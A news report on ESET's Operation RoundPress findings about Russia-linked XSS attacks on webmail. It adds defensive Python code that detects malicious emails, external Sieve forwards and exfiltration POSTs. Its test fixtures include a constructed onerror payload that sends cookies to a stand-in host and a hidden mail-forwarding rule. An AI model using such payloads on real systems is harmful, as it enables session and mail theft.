Russia-linked espionage operation targeting webmail servers via XSS flaws

Cybersecurity researchers at ESET have uncovered a sophisticated cyberespionage campaign, codenamed ‘Operation RoundPress’, attributed with medium confidence to the Russia-aligned Sednit group, also known as APT28, Fancy Bear, or Sofacy. The campaign exploits cross-site scripting (XSS) vulnerabilities in widely used webmail servers to exfiltrate sensitive communications from high-value targets.

Sednit is a group tied to Russia’s GRU military intelligence agency and previously implicated in high-profile operations including the 2016 DNC hack, TV5Monde breach, and WADA email leaks.

Most of the victims are government entities and defense companies in Eastern Europe, especially those linked to the ongoing war in Ukraine. Many are involved in manufacturing Soviet-era weapons destined for Ukrainian forces. Additional targets include governments in Africa, Europe, and South America.

First identified in 2023, RoundPress initially focused on Roundcube webmail servers, exploiting the XSS vulnerability CVE-2020-35730. In 2024 the operation broadened its targeting to Horde, MDaemon, and Zimbra; one attack used CVE-2024-11182, an MDaemon XSS flaw that was a zero-day at the time, i.e. unknown to the vendor and unpatched when it was exploited.

The primary compromise vector in Operation RoundPress is spearphishing: the attackers send emails whose HTML body carries an XSS payload tailored to a specific webmail product. The recipient does not need to click a link or open an attachment; when the message is rendered in a vulnerable webmail instance, the embedded JavaScript runs inside the origin of the webmail application, with the victim's authenticated session, and can read email content, contact lists, and user credentials the same way the legitimate interface does.

One phishing email, sent on September 29, 2023, exploited CVE-2023-43770 in Roundcube. The message was crafted to look benign, with news-related text as its visible content, but the malicious script fired as soon as the email was opened.
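A defender's first question after reading the above is whether any such message is already sitting in the mail store. The following is an added example, not ESET's or any vendor's code, and it does not reproduce the actual Roundcube or MDaemon exploits: it parses raw RFC 5322 messages with Python's standard `email` package and flags HTML parts that carry script in any of the shapes an XSS payload typically takes (a `<script>` tag, an event-handler attribute, a `javascript:` URI, or an active container such as `<svg>` or `<iframe>`). The two sample messages are constructed for the example; the `.invalid` hosts and the `onerror` beacon are illustrative only.

```python
import re
from email import message_from_string, policy

# Heuristics for script-bearing HTML. They are deliberately broad: a sanitizer
# bypass rarely uses a bare <script> tag, so event handlers, javascript: URIs
# and containers that can smuggle script past a weak filter are checked too.
# Expect some false positives; the output is a triage list, not a verdict.
SUSPICIOUS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(r"\son[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("active-container", re.compile(r"<\s*(svg|object|embed|iframe)\b", re.I)),
]

# Constructed sample messages (not real captures). The second one mimics the
# shape of a mail-borne XSS payload: harmless-looking news text plus an image
# whose onerror handler runs script in the webmail origin.
BENIGN_MSG = """\
From: accounting@corp.example
To: analyst@corp.example
Subject: Q3 figures
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body><p>Quarterly figures are in the shared folder.</p></body></html>
"""

MALICIOUS_MSG = """\
From: newsdesk@news-digest.invalid
To: analyst@corp.example
Subject: Daily briefing
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Today's headlines follow.
--b1
Content-Type: text/html; charset=utf-8

<html><body><p>Today's headlines follow.</p>
<img src="x" onerror="fetch('https://collector.invalid/?'+document.cookie)">
</body></html>
--b1--
"""


def scan_message(raw):
    """Return sender, subject and the heuristics hit by any text/html part."""
    msg = message_from_string(raw, policy=policy.default)
    hits = set()
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_content()  # decodes transfer encoding and charset for us
        for name, pattern in SUSPICIOUS:
            if pattern.search(body):
                hits.add(name)
    return {
        "from": str(msg.get("From", "")),
        "subject": str(msg.get("Subject", "")),
        "hits": sorted(hits),
    }


def scan_store(raw_messages):
    """Scan a sequence of raw messages and return only the flagged ones."""
    return [r for r in map(scan_message, raw_messages) if r["hits"]]


if __name__ == "__main__":
    for finding in scan_store([BENIGN_MSG, MALICIOUS_MSG]):
        print(finding)
```

To run this against a real store, feed it the raw messages from an mbox or Maildir (Python's `mailbox` module yields them) and review the hits by hand; the patterns are heuristics and will also fire on some legitimate marketing HTML.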

In November 2024, ESET observed an attack on two Ukrainian state-owned defense companies and a Ukrainian civil air transport company in which the attackers exploited CVE-2024-11182, then a zero-day XSS vulnerability in MDaemon, to steal sensitive data from the victims' mailboxes.

Each targeted webmail platform had a tailored JavaScript payload:

  • SpyPress.ROUNDCUBE

  • SpyPress.HORDE

  • SpyPress.MDAEMON

  • SpyPress.ZIMBRA

For Roundcube targets, ESET says Sednit used CVE-2020-35730 in 2023 and switched to CVE-2023-43770 in 2024. For Zimbra, the group uses CVE-2024-27443 (also tracked as ZBUG-3730).

The payloads have no persistence mechanism of their own: they run only while the malicious email is displayed and run again each time it is reopened. Some variants, such as SpyPress.ROUNDCUBE, compensate by creating Sieve filter rules that forward incoming mail to attacker-controlled addresses, so surveillance continues even after the script has stopped running.
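Because a forwarding rule outlives the XSS payload, auditing users' Sieve scripts is the check that catches this stage after the email itself is gone. The following is an added example, not code from ESET or from any webmail project: it extracts every `redirect` action from a Sieve script (including ones with tagged arguments such as `:copy`), ignores commented-out rules, and reports any target whose domain is not on an allow-list of internal domains. The sample script, the user names and the `.invalid` address are constructed for the example.

```python
import re

# A redirect action, optionally preceded by tagged arguments such as :copy.
# Only the quoted-string form of the address is handled; multi-line string
# literals (text: ... .) are rare in forwarding rules and would be missed.
REDIRECT = re.compile(r'\bredirect\b(?:\s+:[a-z]+)*\s+"([^"]+)"', re.I)


def strip_comments(script):
    """Drop /* */ block comments and # line comments so disabled rules do not count.

    Heuristic: a '#' inside a quoted string is treated as a comment too, which
    can truncate an address; that only causes a miss, never a false hit.
    """
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.S)
    return re.sub(r"#[^\n]*", "", script)


def audit_sieve(script, trusted_domains):
    """Return redirect targets whose domain is not in trusted_domains."""
    trusted = {d.lower() for d in trusted_domains}
    suspicious = []
    for match in REDIRECT.finditer(strip_comments(script)):
        addr = match.group(1)
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain not in trusted:
            suspicious.append(addr)
    return suspicious


def audit_users(scripts, trusted_domains):
    """scripts maps mailbox user -> Sieve script text; returns only users with findings."""
    report = {}
    for user, script in scripts.items():
        bad = audit_sieve(script, trusted_domains)
        if bad:
            report[user] = bad
    return report


# Constructed sample: one rule silently copies all mail out of the organization,
# one is an ordinary internal forward that should not be flagged.
SAMPLE_SIEVE = """\
require ["copy"];
# forward everything, keep a copy so the victim notices nothing
if true {
    redirect :copy "collector@mail.invalid";
}
if address :is "from" "ceo@corp.example" {
    redirect "assistant@corp.example";
}
"""

if __name__ == "__main__":
    scripts = {"alice": SAMPLE_SIEVE, "bob": "if true { keep; }"}
    print(audit_users(scripts, ["corp.example"]))
```

On a Dovecot host the scripts to feed in are the active per-user Sieve files (the location depends on the `sieve` setting in the Pigeonhole configuration); run the audit on a schedule and alert on any new external redirect, since a legitimate forward to an outside address is rare enough in most organizations to justify a manual look.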

ESET says the SpyPress.MDAEMON payload is able to bypass two-factor authentication. All payloads attempt to steal login credentials, sometimes by injecting hidden forms or fake logout/login screens into the webmail page. Stolen data is exfiltrated with HTTP POST requests to hardcoded command-and-control (C&C) servers.
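Because the payload runs in the victim's browser, the exfiltration POSTs leave the network from the workstation, not from the mail server, so the place to look for them is the egress proxy log rather than the webmail server log. The following is an added example, not ESET's or any vendor's code: it scans proxy log lines for POST requests whose `Referer` is the organization's webmail origin but whose destination host is not. The log format (`timestamp client method url status referer`), the host names and the log lines are all constructed for the example; adapt the regular expression to the real proxy's format.

```python
import re
from urllib.parse import urlsplit

# Constructed proxy log lines (not real traffic). Assumed field order:
# <timestamp> <client-ip> <method> <url> <status> <referer>  ('-' if none)
SAMPLE_LOG = """\
2024-11-05T09:14:02Z 10.0.5.23 GET https://mail.corp.example/ 200 -
2024-11-05T09:14:09Z 10.0.5.23 GET https://mail.corp.example/?_task=mail&_uid=812 200 https://mail.corp.example/
2024-11-05T09:14:10Z 10.0.5.23 POST https://mail.corp.example/?_task=mail&_action=mark 200 https://mail.corp.example/
2024-11-05T09:14:11Z 10.0.5.23 POST https://cdn-metrics.invalid/collect 200 https://mail.corp.example/?_task=mail&_uid=812
2024-11-05T09:15:40Z 10.0.5.77 POST https://www.example.net/login 302 https://www.example.net/
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")


def find_webmail_exfil(log_text, webmail_host):
    """Return (timestamp, client, destination host) for every POST made from a
    page on the webmail origin to some other host.

    A script injected into the webmail page inherits that page as its Referer
    (with the default referrer policy the browser sends at least the origin),
    so a cross-origin POST with the webmail Referer is the shape to hunt for.
    """
    findings = []
    for line in log_text.splitlines():
        match = LINE.match(line)
        if not match:
            continue  # unparseable line; count these separately in production
        ts, client, method, url, _status, referer = match.groups()
        if method != "POST" or referer == "-":
            continue
        if urlsplit(referer).hostname != webmail_host:
            continue
        dest = urlsplit(url).hostname
        if dest != webmail_host:
            findings.append((ts, client, dest))
    return findings


if __name__ == "__main__":
    for finding in find_webmail_exfil(SAMPLE_LOG, "mail.corp.example"):
        print("possible exfiltration from webmail session:", finding)
```

Two caveats: a `Referrer-Policy: no-referrer` on the webmail origin, or a payload that uses `navigator.sendBeacon` with a stripped referrer, removes the signal this check relies on, and legitimate third-party telemetry embedded in the webmail UI will also match, so maintain an allow-list of known destinations before alerting on the result.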

“Over the past two years, webmail servers such as Roundcube and Zimbra have been a major target for several espionage groups such as Sednit, GreenCube, and Winter Vivern. Because many organizations don’t keep their webmail servers up to date and because the vulnerabilities can be triggered remotely by sending an email message, it is very convenient for attackers to target such servers for email theft,” ESET has warned.
